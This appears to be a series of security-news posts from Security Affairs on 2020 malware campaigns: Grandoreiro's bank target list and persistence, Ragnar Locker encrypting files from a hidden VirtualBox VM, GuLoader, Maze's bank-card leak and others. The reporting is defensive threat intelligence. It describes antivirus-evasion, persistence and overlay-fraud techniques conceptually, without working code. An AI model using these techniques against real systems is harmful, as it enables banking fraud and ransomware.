The malware scope was extended also to Portugal now, with several Portuguese banks included in the malware operations  as  highlighted below.

Figure 11: List of the Portuguese banks included in the Grandoreiro version of May 2020.

A complete list of the targeted banking organizations can be found below (Grandoreiro May 2020).00CF0808 <AnsiString> 'Cecabank'00CF081C <AnsiString> 'natwest'00CF082C <AnsiString> 'SantanderUK'00CF0840 <AnsiString> 'HSBCUK'00CF0850 <AnsiString> 'Barclays'00CF0864 <AnsiString> 'BICE'00CF0874 <AnsiString> 'Ripley'00CF0884 <AnsiString> 'Bci'00CF0890 <AnsiString> 'Chile'00CF08A0 <AnsiString> 'BancoEstado'00CF08B4 <AnsiString> 'Falabella'00CF08C8 <AnsiString> 'Itaú'00CF08D8 <AnsiString> 'Santander'00CF08EC <AnsiString> 'Scotiabank'00CF0900 <AnsiString> 'PT_1'00CF8E00 <AnsiString> 'Cecabank'00CF8E14 <AnsiString> 'natwest'00CF8E24 <AnsiString> 'SantanderUK'00CF8E38 <AnsiString> 'HSBCUK'00CF8E48 <AnsiString> 'Barclays'00CF8E5C <AnsiString> 'BICE'00CF8E6C <AnsiString> 'Ripley'00CF8E7C <AnsiString> 'Bci'00CF8E88 <AnsiString> 'Chile'00CF8E98 <AnsiString> 'BancoEstado'00CF8EAC <AnsiString> 'Falabella'00CF8EC0 <AnsiString> 'Itaú'00CF8ED0 <AnsiString> 'Santander'00CF8EE4 <AnsiString> 'Scotiabank'00CF8EF8 <AnsiString> 'PT_1'00CF8F7C <AnsiString> 'EUR '00CF8F98 <AnsiString> 'TRAVALiberbank'00CF8FB0 <AnsiString> 'TRAVABBVA'00CF8FC4 <AnsiString> 'TRAVABANKIA'00CF8FD8 <AnsiString> 'TRAVAlacaixa'00CF8FF0 <AnsiString> 'TRAVASTESPANHA'00CF9008 <AnsiString> 'TRAVABLOCKCHAIN'00CF9020 <AnsiString> 'TRAVACAJARURAL'00CF9038 <AnsiString> 'TRAVASabadell'00CF9050 <AnsiString> 'TRAVABANKINTER'00CF9068 <AnsiString> 'TRAVAlabooral'00CF9080 <AnsiString> 'TRAVAcajamar'00CF9098 <AnsiString> 'TRAVAOpenbank'00CF90B0 <AnsiString> 'TRAVAING'00CF90C4 <AnsiString> 'TRAVAPichincha'00CF90DC <AnsiString> 'TRAVACaixaGeral'00CF90F4 <AnsiString> 'TRAVAMediolanum'00CF910C <AnsiString> 'TRAVAUnicaja'00CF9124 <AnsiString> 'TRAVATRIODOS'00CF913C <AnsiString> 'TRAVAACTIVOBANK'00CF9154 <AnsiString> 'TRAVACecabank'00CF916C <AnsiString> 'TRAVAACTIVOBANKPT'00CF9188 <AnsiString> 'TRAVAMONTEPIOpt'00CF91A0 <AnsiString> 'TRAVAnovobancopt'00CF91BC <AnsiString> 'TRAVAsantapt'00CF91D4 <AnsiString> 'TRAVAmillenniumbcppt'00CF91F4 <AnsiString> 'TRAVACaixadirectapt'00CF9210 <AnsiString> 'TRAVAEuroBicpt'00CF9228 <AnsiString> 'TRAVACréditoAgrícola'00CF9248 <AnsiString> 'TRAVABPI'00CF925C <AnsiString> 'TRAVAPortugalBBVA'00CF9278 <AnsiString> 'TRAVABICE'00CF928C <AnsiString> 'TRAVARipley'00CF92A0 <AnsiString> 'TRAVABci'00CF92B4 <AnsiString> 'TRAVAChile'00CF92C8 <AnsiString> 'TRAVABancoEstado'00CF92E4 <AnsiString> 'TRAVABancoFalabella'00CF9300 <AnsiString> 'TRAVAItaú'00CF9314 <AnsiString> 'TRAVASantander'00CF932C <AnsiString> 'TRAVACHILEScotiabank'00CF934C <AnsiString> 'TRAVASGLOBAL'00CF93EC <AnsiString> 'RECORTEcecabank'00CF9404 <AnsiString> 'RECORTECTIVOBANK'00CF9420 <AnsiString> 'RECORTECaixaGeral'00CF943C <AnsiString> 'RECORTEBBVA'00CF9450 <AnsiString> 'RECORTELACAIXA'00CF9468 <AnsiString> 'RECORTESTDAESPANHA'00CF9484 <AnsiString> 'RECORTEBLOCKCHAIN'00CF94A0 <AnsiString> 'RECORTECAJARURAL'00CF94BC <AnsiString> 'RECORTESabadell'00CF94D4 <AnsiString> 'RECORTEBANKINTER'00CF94F0 <AnsiString> 'RECORTElaboral'00CF9508 <AnsiString> 'RECORTEBBANKIA'00CF9520 <AnsiString> 'RECORTEcajamar'00CF9538 <AnsiString> 'RECORTELiberbank'00CF9554 <AnsiString> 'RECORTEOpenbank'00CF956C <AnsiString> 'RECORTEING'00CF9580 <AnsiString> 'RECORTEPichincha'00CF959C <AnsiString> 'RECORTEibercaja'00CF95B4 <AnsiString> 'RECORTEMediolanum'00CF95D0 <AnsiString> 'RECORTEUnicaja'00CF95E8 <AnsiString> 'RECORTETRIODOS'00CF9600 <AnsiString> 'RECORTEACTIVOBANKPT'00CF961C <AnsiString> 'RECORTEnovobancopt'00CF9638 <AnsiString> 'RECORTEMONTEPIOpt'00CF9654 <AnsiString> 'RECORTEsantapt'00CF966C <AnsiString> 'RECORTEmillenniumbcppt'00CF968C <AnsiString> 'RECORTECaixadirectapt'00CF96AC <AnsiString> 'RECORTEEuroBicpt'00CF96C8 <AnsiString> 'RECORTESCréditoAgrícola'00CF96E8 <AnsiString> 'RECORTESBPI'00CF96FC <AnsiString> 'RECORTESPortugalBBVA'00CF971C <AnsiString> 'RECORTEBICE'00CF9730 <AnsiString> 'RECORTERipley'00CF9748 <AnsiString> 'RECORTEBci'00CF975C <AnsiString> 'RECORTEChile'00CF9774 <AnsiString> 'RECORTEBancoEstado'00CF9790 <AnsiString> 'RECORTEFalabella'00CF97AC <AnsiString> 'RECORTEItaú'00CF97C0 <AnsiString> 'RECORTESantander'00CF97DC <AnsiString> 'RECORTECHILEScotiabank'00CF97FC <AnsiString> 'RECORTESGLOBAL'

As already documented by ESET, the malware has a set of capabilities:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine
  • blocking access to chosen websites

In detail, the malware performs its tasks according to the OS installed on the infected device ( label 1 – Figure 12 ). Several Windows OS target versions can be found inside the malware, namely:

  • Windows 10 Home
  • Windows 8
  • Windows 10
  • Windows Server

Figure 12:  Grandoreiro blocks of code executed during the infection process. All the highlighted labels are described below.

 Label 2  shows a call that examines the affected device and creates a folder inside \AppData\Roaming where new modules can be downloaded into and also some data about the target bank portal can be temporarily stored.

Figure 13: The malware uses some in-memory paths that will be created when the target banking portal and victims’ details are collected.

 Label 3  in Figure 12 shows when the process of collecting details and browser overlay is initiated. “DetonarProcesso” Portuguese word can be translated to: “Trigger process”, in English. The malware starts here its process of collecting details about the banking portal when the victim accesses a target banking website.

In addition,  label 4 and label 5  are the calls responsible for creating the overlay window that will be presented on the victims’ screen.

Finally,  label 6 shows that the overlay windows is presented based on the target banking organization.

During its execution, Grandoreiro collects some details about the infected device:

  • computer name and username
  • operating system; and
  • list of installed security products.

SELECT * FROM AntiVirusProduct

Interesting that the malware is not executed when two computer names are found. They probably are the computer names from Grandoreiro operators/developers. This is can be seen as a potential kill switch.

Figure 14: Computer names hardcoded inside the malware.

Grandoreiro capabilities and Latenbot-C2 features

Grandoreiro is a piece of malware that has evolved over time. It has capabilities to interact with the infected machine, receiving commands from C2, and executes them inside the machine as a simple botnet.

As described by ESET on older variants; and confirmed during this analysis; the malware is capable of:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine; and
  • blocking access to chosen websites

Figure 14: Grandoreiro internal commands (left side) and browser management (right side).

The malware persistence is achieved via a registry key on Windows\CurrentVersion:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunValue: C:\Users\root\AppData\Roaming\nvreadmm\Inufturiols.exe

An interesting detail in this variant is the C2 communication. The C2 IP address can be identified below, where also the name “DANILO” is visible.

Figure 15: Grandoreiro C2 IP address.

Inside the malware and based on the web traffic analysis, it’s possible to see similarities with latenbot C2-traffic (as presented here).

Figure 16: Latenbot  (2017) and Grandoreiro (2020) C2-traffic similarities.

Grandoreiro operators probably are including Latenbot botnet modules as a way of improving communication between C2 and infected hosts – the creation of a kind of Grandoreiro botnet.

Figure 17: Grandoreiro C2-traffic.

Grandoreiro PE file padding

As observed in ESET analysis, “the vast majority of Grandoreiro samples utilize a very interesting application of the binary padding technique. This technique is all about making the binaries large and we have seen it being used even by more sophisticated malware. We have also observed some other Latin American banking trojans employing it occasionally, but only in the simplest form of appending a large amount of junk at the end of the binary.

Grandoreiro chooses a different approach – a simple, yet very effective one. The resources section of the PE file is augmented by (usually 3) grande BMP images, making each binary at least 300 MB in size.”

The samples analyzed in May 2020 that target Portuguese users used the technique previously described.

Figure 18 below shows that the resources directory is big and populates part of the binary size.

Figure 18: PortEx padding analysis – Grandoreiro May 2020.

Three BMP images were specially created by Grandoreiro operators as a way of enlarging the size of binary file. Notice that the PE file size is 331 MB and 322 MB are only populated by three BMP resources (the technique used by malware operators in past samples).

Figure 19: BMP resources used by Grandoreiro malware to increase file size and to bypass AV’s detection.

Spam tool

During May 2020 was observed that many phishing emails targeting Portuguese users were disseminated via a spam tool called: Leaf PHPMailer 2.8. Crooks compromise several servers and are using tools like this to sent malicious emails to a large group of users.

Below is presented a screenshot from a compromised server we analyzed during this investigation.

Figure 20: Spam tool used by Grandoreiro operators to disseminate malscam campaigns in-the-wild in Portugal.

Finally, the malware server online with the ISO files, spam tool, and C2 were decommissioned at the moment of writing this publication.

Additional details, including the Indicators of Compromise (IOCs), are available in the analysis published by Pedro Tavares.

About the author Pedro Tavares

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.

Pierluigi Paganini

(SecurityAffairs – Grandoreiro Malware, hacking)

The post Grandoreiro Malware implements new features in Q2 2020 appeared first on Security Affairs.

The evolution of ransomware in 2019: attackers think bigger, go deeper and grow more advanced

The number of ransomware attacks increased by 40 percent last year, according to Group-IB attackers think bigger and grow more advanced.

Group-IB, a Singapore-based cybersecurity company that specializes in preventing cyberattacks, found out that the year of 2019 was marked by ransomware evolution and was dominated by increasingly aggressive ransomware campaigns, with its operators resorting to more cunning TTPs, reminding those of APT groups to get their victims shell out.

The number of ransomware attacks increased by 40 percent last year, according to Group-IB’s incident response engagements and industry researchers data, while devious techniques employed by the attackers helped them to push the average ransom grow over tenfold in just one year. The greediest ransomware families with highest pay-off were RyukDoppelPaymer and REvil

The findings come as highlights of Group-IB whitepaper titled “Ransomware Uncovered: Attackers’ Latest Methods,” closely examining the evolution of the ransomware operators’ strategies over the past year, issued today. 

Big Game Hunting 

Last year, ransomware operators matured considerably, having joined Big Game Hunting and going beyond file encryption. More groups started distributing ransomware, and Ransomware-as-a-Service (RaaS) adverts opted to focus their attacks on big enterprise networks rather than individuals. TTPs employed by ransomware operators showed that they came to resemble what once was considered a modus operandi of primarily APT groups — last year saw even trusted relationship and supply chain attacks conducted by ransomware operators. 

Another feature that ransomware operators started to share with APT groups was downloading of sensitive data from victims’ servers. It should, however, be noted, that unlike APT groups that download the info for espionage purposes, ransomware operators downloaded it to then blackmail their victims to increase the chances of ransom being paid. If their demands were not met, they attempted to sell the confidential information on the black market. This technique was used by REvil, Maze, and DoppelPaymer operators. 

Big Game Hunters frequently used different trojans to gain an initial foothold in the target network: in 2019, a wide variety of trojans was used in ransomware campaigns, including Dridex, Emotet, SDBBot, and Trickbot. 

In 2019, most ransomware operators actively used post-exploitation frameworks. For instance, Ryuk, Revil, Maze, and DoppelPaymer actively used such tools, namely Cobalt Strike, CrackMapExec , PowerShell Empire, PoshC2, Metasploit, and Koadic, which helped them collect as much information as possible about the compromised network. Some operators used additional malware during their post-exploitation activities, which gave them more opportunities to obtain authentication data and even full control over Windows domains. 

How it all began

In 2019, the majority of ransomware operators used phishing emails, intrusion through external remote services, especially through RDP, and drive-by compromise as initial attack vectors. 

Phishing emails continued to be the most common initial access technique. This technique’s main admirers were Shade and Ryuk. Financially-motivated threat actor TA505 also started its Clop ransomware campaigns from a phishing email containing a weaponized attachment that would download FlawedAmmy RAT or SDBBot, among others.

Last year, the number of accessible servers with an open port 3389 grew to over 3 million, with the majority of them located in China, the United States, Germany, Brazil, and Russia. This attack vector was popularized among cybercriminals by the discovery of five new Remote Desktop Service vulnerabilities, none of which however was successfully exploited. Dharma and Scarab operators were the most frequent users of this attack vector.

In 2019, attackers also frequently used infected websites to deliver ransomware. Once a user found themselves on such a website, they are redirected to websites, which attempt to exploit vulnerabilities in, for example, their browsers. Exploit kits most frequently used in these drive-by attacks were RIG EK, Fallout EK, and Spelevo EK.

Some threat actors, such as Shade (Troldesh) and STOP operators, immediately encrypted data on the initially compromised hosts, while many others, including Ryuk, REvil, DoppelPaymer, Maze, and Dharma operators, gathered info about the intruded network, moving laterally and compromising entire network infrastructures.

The full list of the TTPs outlined in the whitepaper can be found in the heat map below, which is based on MITRE’s revolutionary ATT&CK matrix. They are ordered from the most commonly used (red) to the least commonly used (green).

ransomware heat map

   Figure 1 – Heat map of ransomware operators’ TTPs based on MITRE’s ATT&CK matrix

Game-changer

After a relative lull in 2018, the year of 2019 saw ransomware returning at full strength, with the number of ransomware attacks having grown by 40 percent in 2019 year-on-year. The larger targets determined greater ransoms — the average figure soared from $8,000 in 2018 to $84,000 last year, according to the industry researchers. The most aggressive and greediest ransomware families were RyukDoppelPaymer and REvil, whose single ransom demand reached up to $800,000. 

“The year of 2019 was marked by ransomware operators enhancing their positions, shifting to larger targets and increasing their revenues, and we have good reason to believe that this year they will celebrate with even greater achievements,” comments Group-IB Senior Digital Forensics Specialist Oleg Skulkin. “Ransomware operators are likely to continue expanding their victim pool, focusing on key industries, which have enough resources to satisfy their appetites. The time has come for each company to decide whether to invest money in boosting their cybersecurity to make their networks inaccessible to threat actors or risk being approached with ransom demand and go down for their security flaws.”

Despite the vim, showed by ransomware operators recently, there is still a number of measures that can be taken to ward off ransomware attacks. They include, among others, using VPN whenever accessing servers through RDP, creating complex passwords for the accounts used for access via RDP and changing them regularly, restricting the list of IP addresses that can be used to make external RDP connections, and many others. More recommendations can be found in the relevant section of the whitepaper

Additional details are included in the report “Ransomware Uncovered: Attackers’ Latest Methods” published by Group-IB.

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks, online fraud, IP protection and high-profile cyber investigations. Group-IB’s Threat Intelligence system has been named one of the best in class by Gartner, Forrester, and IDC.

Pierluigi Paganini

(SecurityAffairs – ransomware, hacking)

The post The evolution of ransomware in 2019: attackers think bigger, go deeper and grow more advanced appeared first on Security Affairs.

Researchers dismantled ShuangQiang gang’s botnet that infected thousands of PCs

A joint operations conducted by experts from Chinese firms Qihoo 360 Netlab and Baidu dismantle the ShuangQiang ‘s botnet infecting over hundreds of thousands of systems.

A joint operation conducted by Chinese security firm Qihoo 360 Netlab and tech giant Baidu disrupted a botnet operated by a group tracked as ShuangQiang (aka Double Gun) that infected over hundreds of thousands of systems.

ShuangQiang is financially motivated, it has been active since 2017 targeting Windows computers with MBR and VBR bootkits, and installing malicious drivers for financial gain and hijack web traffic to e-commerce sites.

“Recently, our DNS data based threat monitoning system DNSmon flagged a suspicious domain pro.csocools.com. The system estimates the scale of infection may well above hundreds of thousands of users. By analyzing the related samples and C2s.” reads the analysis published by the experts.
“We traced its family back to the ShuangQiang(double gun) campaign, in the past, this campaign has been exposed by multiple security vendors, but it has rvivied and come back with new methods and great force.”

Threat actors were distributing configuration files and malware that were hidden using steganography in images uploaded to Baidu Tieba. The hackers also began using Alibaba Cloud storage to host configuration files and Baidu’s analytics platform Tongji as command infrastructure.

The attack chain leverages game launching software from underground game portals that contain malicious code masqueraded as a patch.

Attackers used two methods to infect the victims, one using the game launcher with malicious code, the second releasing and load a malicious driver.

ShuangQiang botnet

Upon downloading and installing the alleged patch from an underground game server, the victim accesses the configuration information to download another program named “cs.dll” from Baidu Tieba that’s stored as an image file. Then the “cs.dll” creates a bot ID and contacts the C2, then it injects a second driver that hijacks system processes (e.g., lassas.exe and svchost.exe) to download next-stage payloads.

“The drive will copies itself to Windows/system32/driver/{7 random letters}.sys to disguise itself as a legitimate drive, such as fltMgr.sys, and inject DLL module to the system processes Lassas.exeand svchost.exe.” continues the report. “After the entire initialization process is completed, a driver and DLL module work together to complete the work mode through DeviceIoControl () , which is a driver-level downloader. All sensitive configuration information is stored inside the driver.”

In the second attack chain detailed by the researchers, the attackers leverage DLL hijacking to force game client software into loading malicious DLL files using the same name.

Threat actors altered the software using a modified version of photobase.dll, which is used by multiple underground game client software.

Experts from Qihoo 360 Netlab reported their findings to Baidu on May 14 and that launched a jointly operations to block the botnet by tracking all the URLs used by the attackers.

“During this joint action, we had a better understanding on double gun gang’s technical means, logic, and rules, by sharing, analysising, and response to the related threat intelligence.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – ShuangQiang, hacking)

The post Researchers dismantled ShuangQiang gang’s botnet that infected thousands of PCs appeared first on Security Affairs.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign use messages that pretend to be sent by the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team (CERT) from the AgID Agency released an advisory about this threat.

Attackers attempt to take advantage of the interest on the contact tracing app Immuni that was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT that shared samples with the malware community.

Email messages used as lure are written in Italian and informs citizens of the release of a beta release of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against COVID-19 outbreak.

To trick victims into downloading the malicious app, threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (FOFI.it).

The attackers registered the “fofl.it,“ domain to trick victims.

The content of the email includes download links and contact information that combines email addresses from the attacker and FOFI.

Upon executing the malware it displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background the FuckUnicorn starts encrypting data on the system, it encrypts the files in certain paths (/Desktop, /Links, /Contacts, /Documents, /Downloads, /Pictures, /Music, /OneDrive, /Saved Games, /Favorites, /Searches, and /Videos) with these extensions:

.Txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv,. py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas , .db, .torrent "

The malicious code adds the “.fuckunicornhtrhrtjrjy” extensions to names of encrypted files.

The FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300, worth of Bitcoin, in three days or the data would be lost.

The email address in the ransom note is invalid making it impossible to send the attacker the payment proof.

At the time, there are no transactions recorded for the wallet included in the ransom note.

The good news for the victims is that CERT-AgID discovered that the password for encrypting the files is sent in clear text to the attacker, this means that it can be retrieved from the network traffic.

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

The post Fuckunicorn ransomware targets Italy in COVID-19 lures appeared first on Security Affairs.

Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid

Threat actors are offering for sale more than two dozen SQL databases belonging to e-commerce websites for different countries.

Hackers are offering for sale more than two dozen SQL databases stolen from online shops from multiple countries.

Threat actors have compromised insecure servers exposed online and after copying the content of their websites they left a ransom note.

Some of the databases are dated as 2016, but data starts from March 28, 2020.

Crooks’ demand is BTC 0.06 ($485 at current price), they threaten to leak the content of the database if the victims don’t pay the ransom in 10 days.

The ransom notes observed in this campaign include a couple of wallets that received more than 100 transactions for a total of BTC 5.8 ($47,150 at current price).

“The number of abuse reports for these two wallets is over 200, the oldest being from September 20, 2019. The most recent one is from May 20 and this month alone there were nine reports, indicating that the actor is highly active.” reported BleepingComputer.

“It is important to note that the hacker may use more than the wallets found by BleepingComputer.”

The seller is offering 31 databases and gives a sample for the buyers to check the authenticity of the data.

Most of the listed databases are from online stores in Germany, others e-store hacked by threat actors are from Brazil, the U.S., Italy, India, Spain, and Belarus.

The hacked stores were running Shopware, JTL-Shop, PrestaShop, OpenCart, Magento v1 and v2 e-commerce CMSs.

The databases contain a total of 1,620,000 rows, exposed records include email addresses, names, hashed passwords (e.g. bcrypt, MD5), postal addresses, gender, dates of birth.

It isn’t the first time that crooks target unprotected databases, experts observed several attacks targeting unprotected MongoDB installs.

Pierluigi Paganini

(SecurityAffairs – SQL databases, hacking)

The post Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid appeared first on Security Affairs.

Ragnar Ransomware encrypts files from virtual machines to evade detection

Ransomware encrypts from virtual machines to evade antivirus

Ragnar Locker deploys Windows XP virtual machines to encrypt victim’s files, the trick allows to evaded detection from security software.

Crooks always devise new techniques to evade detection, the Ragnar Locker is deploying Windows XP virtual machines to encrypt victim’s files while bypassing security measures.

The Ragnar Locker appeared relatively in the threat landscape, at the end of the 2019 it was employed in attacks against corporate networks. 

One of the victims of the ransomware is the energy giant Energias de Portugal (EDP), where the attackers claimed to have stolen 10 TB of files.

While many ransomware infections terminate security programs before encrypting,

This sample of Ragnar Locker terminates security programs and managed service providers (MSP) utilities to prevent them from blocking the attack.

“A new ransomware attack method takes defense evasion to a new level—deploying as a full virtual machine on each targeted device to hide the ransomware from view. In a recently detected attack, Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine.” reads the report published by Sophos. “The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.”

The attack chain starts with the creation of a tool folder that includes VirtualBox, a mini Windows XP virtual disk called micro.vdi, which is an image of a stripped-down version of the Windows XP SP3 OS (MicroXP v0.82). The image includes the 49 kB Ragnar Locker ransomware executable, the attack also includes several executables and scripts to prep the environment.

Ragnar Locker ransomware

The malware leverage a VirtualBox feature that allows the host operating system to share folders and drives as a network share inside a virtual machine.  The virtual machine mounts the shared path as a network drive from the \\VBOXSVR virtual computer to access their content.

“In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script.” continues the analysis. “The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.”

The install.bat batch file allows the threat to scan for local drives and mapped network drives on the host and builds a configuration file that automatically shares them with the virtual machine.

The script also prepares an sf.txt file containing VirtualBox configuration settings to automatically share all of the drives on the computer with the virtual machine.

The attackers launch the Windows XP virtual machine using the SharedFolder directives created by their batch file that are accessible within the virtual machine. and the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

When launched, all of these shared drives will now be accessible from within the virtual machine. Experts pointed you that the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

Windows XP virtual machine
Windows XP virtual machine
(Source: Sophos)

Also included is a vrun.bat file that is located in the Startup folder so that it is launched immediately when the virtual machine starts.

This vrun.bat file, shown below, will mount each shared drive, encrypt it, and then proceed to the next drive shared with the virtual machine.

Mounting all the shared drives to encrypt
Mounting all the shared drives to encrypt

As the security software running on the victim’s host will not detect the ransomware executable or activity on the virtual machine, it will happily keep running without detecting that the victim’s files are now being encrypted.

It should be noted that if the victim was running Windows 10’s Controlled Folder Access anti-ransomware feature, it may have been protected from an attack like this as the operating system would have detected writes to the protected folders.

When done, the victim will find a custom ransom note on their computer explaining how their company was breached, and their files were encrypted.

Custom Ragnar Locker ransom note
(Source: Sophos)

The use of a virtual machine to encrypting a device’s files without being detected is an innovative approach.

As VirtualBox and a Windows XP virtual machine are not considered malicious, most security software will not be concerned that it is blissfully writing to all the data on the computer.

This attack illustrates how security software with behavioral monitoring is becoming more important to stem the tide of ransomware infections.

Only by detecting the unusual mass file writes, would this attack be detected.

Pierluigi Paganini

(SecurityAffairs – Ragnar Locker ransomware, hacking)

The post Ragnar Ransomware encrypts files from virtual machines to evade detection appeared first on Security Affairs.

Maze ransomware operators leak credit card data from Costa Rica’s BCR bank

Maze ransomware operators published credit card details stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Maze ransomware operators have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Early May, Maze Ransomware operators claimed to have hacked the network of the state-owned Bank of Costa Rica Banco BCR and to have stolen internal data, including 11 million credit card credentials.

Banco BCR has equity of $806,606,710 and assets of $7,607,483,881, it is one of the most solid banks in Central America.

The hackers claim to have compromised the Banco BCR’s network in August 2019, and had the opportunity to exfiltrate its information before encrypting the files.

Maze Ransomware crew

According to Maze, the bank’s network remained unsecured at least since February 2020.

Anyway, the group explained that they did not encrypt the bank documents in February, because it “was at least incorrect during the world pandemic”.

The stolen data includes 4 million unique credit card records, and 140,000 allegedly belonging to USA citizens.

Now the Maze ransomware operators published a post on their leak site along with a spreadsheet (2GB in size) containing the payment card numbers from customers of Banco de Costa Rica (BCR).

MAze-BCR.jpg

The threat actors decided to leak the credit card number to lack of security measures implemented by the bank.

Security firm Cyble confirmed the data leak, over 2GB of data.

“Just like previously, the Cyble Research Team has verified the data leak, which consists of a 2GB CSV file containing details of various Mastercard and Visa credit cards or debit cards.” reads the post published by Cyble. “As per Cyble’s researchers, the Maze ransomware operators have made this data leak due to the Banco de Costa not taking the previous leaks seriously. Along with that, the Maze ransomware operators have threatened the BCR about this type of leak going to happen every week.”

Maze ransomware operators published screenshots showing unencrypted Visa or MasterCard credit card numbers, all the cards have been issued by BCR.

The BCR bank always denied that its systems have been hacked by the Maze gang.

“After multiple analyzes carried out by internal and external specialists in computer security, no evidence has been found to confirm that our systems have been violated. The permanent monitoring of our clients’ transactions confirms that none has been affected.” reads the last statement published by the bank.

Pierluigi Paganini

(SecurityAffairs – BCR, hacking)

The post Maze ransomware operators leak credit card data from Costa Rica’s BCR bank appeared first on Security Affairs.

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 17 – May 23, 2020 appeared first on Security Affairs.

Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

Researchers from Vipre Labs observed a spike in the use of GuLoader in COVID-19-themed campaign since March 2020.

GuLoader

The discovery confirms that crooks continue to use COVID-19 lures in malspam campaigns. In the campaign monitored by Vipre Labs, attackers used spam email samples containing GuLoader.

The GuLoader is a popular RAT that appeared in the threat landscape in 2019 and that was involved in other COVID-19 campaigns, it is written in VB5/6 and compressed in a .rar/.iso file. 

GuLoader is usually employed in spam campaigns using bill payments, wire transfers or COVID lures.

In the last campaign observed by experts, the downloader utilizes cloud hosting services to keep the payload encrypted.

“This malware downloader utilizes cloud hosting services like Microsoft OneDrive or Google Drive to keep its payload encrypted. Also, GuLoader is used to download Remote Access Trojan (RAT) or files that allow attackers to control, monitor, or steal information on the infected machine.” reads the analysis.

The malware implements anti-analysis techniques, such as an anti-debugger. In order to achieve persistence, GuLoader creates a folder in which to place a copy of itself and modifies a registry key.

Now the loader implements process hollowing and use the child processes to download, decrypt, and map the payload into memory.

Common payloads downloaded by the loader are Formbook, NetWire, Remcos, Lokibot, and others.

The analysis published by Vipre Labs includes technical details about the threats, including Indicators of Compromise (IoCs).

In early March, experts at MalwareHunterTeam uncovered a COVID-19-themed campaign that was distributing the GuLoader malware to deliver the FormBook information-stealing Trojan.

The campaign was using emails that pretend to be sent by members of the World Health Organization (WHO).

Pierluigi Paganini

(SecurityAffairs – COVID-19, malspam)

The post Experts observed a spike in COVID-19 related malspam emails containing GuLoader appeared first on Security Affairs.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night based on the Zeus banking Trojan that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaign. 

Silent Night

The source code of the Zeus Trojan is available in the cybercrime underground since 2011 allowing crooks to develop their own release since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx, it was first spotted in November 2019 when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe was advertising the Trojan as the result of over five years of work, a total of 15k ~ hours were spent for the development of the malicious code.

